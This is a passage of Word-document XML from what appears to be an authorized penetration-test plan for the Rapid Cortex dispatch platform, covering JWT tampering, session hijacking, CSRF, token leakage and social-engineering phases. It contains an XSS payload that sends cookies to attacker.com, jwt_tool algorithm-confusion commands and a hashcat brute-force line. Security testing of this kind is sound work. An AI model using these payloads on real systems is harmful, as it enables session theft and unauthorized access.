          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u https://api.rapidcortex.us/FUZZ \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Authorization: Bearer {token}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -mc 200,201,202,301,302,401,403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex Specific Exploit Targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT and API Gateway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Tamper with custom:agencyId claim — can a dispatcher access another agency's incidents?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Tamper with custom:role claim — can a dispatcher escalate to supervisor or rcsuperadmin?</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Algorithm confusion — try HS256 with the Cognito public key as the HMAC secret</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None algorithm — send JWT with alg: none and no signature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Expired token reuse — does the API accept tokens past their expiry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CAD Integration Endpoints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POST /api/cad/webhook/{agencyId}/{integrationId} — inject malformed CAD payloads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POST /api/cad/cap/ingest/{agencyId} — inject malformed CAP 1.2 XML</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POST /api/cad/cap/ingest/auto — FIPS routing bypass — can one agency receive another's CAP alerts?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Force poll endpoint — does /api/admin/cad-integrations/{id}/force-poll require auth?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ring OAuth Integration</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Open redirect — manipulate return_url parameter to redirect to attacker-controlled site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State parameter bypass — replay an old OAuth state token</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Token leakage — does the Ring access token appear in CloudWatch logs or API responses?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Reconnection race — submit two simultaneous reconnect requests to trigger state conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Billing and Pricing</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Attempt to access /api/admin/pricing/global as rcadmin (should be 403)</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Attempt to access /api/admin/pricing/tenants/{id} as agencyadmin (should be 403)</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Attempt PUT /api/admin/pricing/tenants/{id} with a different agencyId in the body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Attempt to access another agency's invoices via /api/agencies/{agencyId}/invoices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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JWT claim tampering allows cross-tenant data access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role escalation achievable via token manipulation</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All unauthenticated requests to protected endpoints return 401 or 403</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Ring OAuth tokens appear in logs or API responses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CAP ingest correctly rejects malformed XML without exposing internal errors</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Phase 3 — Session Hijacking Tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Session hijacking tests verify that authentication tokens cannot be stolen, forged, or replayed by an attacker to impersonate a legitimate user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Cookie Theft via XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test for reflected XSS on input fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('https://attacker.com/steal?c='+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test for stored XSS in incident narrative, caller name fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># If XSS succeeds and tokens are in cookies — session is compromised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="7C3AED" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="F5F3FF" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex uses Cognito tokens (JWT in Authorization header) not session cookies. XSS cannot steal Authorization header values directly, but can make authenticated API calls from the victim's browser context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. JWT Algorithm Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Install jwt_tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install jwt_tool</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Decode a captured JWT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {JWT_TOKEN}</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Test algorithm confusion (RS256 → HS256)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {JWT_TOKEN} -X a</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Test 'none' algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {JWT_TOKEN} -X n</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Brute force weak HMAC secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -a 0 -m 16500 {JWT_TOKEN} /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. CSRF Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test if state-changing requests require CSRF token or SameSite cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build a cross-origin form that submits to a Rapid Cortex endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># If the request succeeds from a different origin — CSRF is possible</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Test the CAD write-back approval endpoint specifically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># POST /api/admin/cad-writeback-approvals/{id}/approve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Should require CSRF token or check Origin/Referer header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Token Leakage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Check CloudWatch log groups for JWT tokens in Lambda logs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Check API Gateway access logs for Authorization header values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Verify Ring access tokens are not returned in any API response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Check that QR scan events do not log user session tokens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Verify presigned S3 URLs expire correctly (max 1 hour per policy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Cognito-Specific Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test user pool enumeration via login error messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 'User does not exist' vs 'Incorrect password' leaks valid usernames</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Test account takeover via password reset flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Can an attacker request a password reset for any email?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Does the reset code expire and work only once?</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Test Cognito refresh token rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Can a stolen refresh token be used after the user logs out?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex Specific Session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2880"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Endpoint / Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Test Method</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Dispatcher impersonation</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All dispatch API endpoints</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Tamper agencyId/role in JWT</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Supervisor approval bypass</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POST /api/admin/cad-writeback-approvals/*/approve</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Replay dispatcher token against approve endpoint</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Cross-agency incident access</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GET /api/incidents/{id}</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Use Agency A token to request Agency B incident ID</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Ring token reuse</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GET /api/integrations/ring/callback</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Replay OAuth code after it has been exchanged</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CAP token replay</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POST /api/cad/cap/ingest/{agencyId}</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Replay a previously accepted CAP alert</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Stale OAuth state</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Ring login flow</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Submit two simultaneous login requests</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Pricing data access</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GET /api/admin/pricing/global</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Use rcadmin token against rcsuperadmin endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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Algorithm confusion attacks rejected with 401</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None algorithm JWT rejected</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Tokens do not appear in any CloudWatch log group</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CSRF protection present on all state-changing endpoints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Cognito user pool does not enumerate valid usernames via error messages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Refresh tokens invalidated on logout</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Ring OAuth state tokens are single-use and expire after 600 seconds</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Phase 4 — Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering tests must only be conducted by a contracted professional firm with explicit written authorization from Rapid Cortex leadership AND written consent from the affected agency if testing extends to agency employees. Internal team members must be notified after the test (not before, to preserve test validity). HR must be briefed before testing begins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether employees can be manipulated into revealing credentials, granting unauthorized access, or performing actions that compromise platform security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Categories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
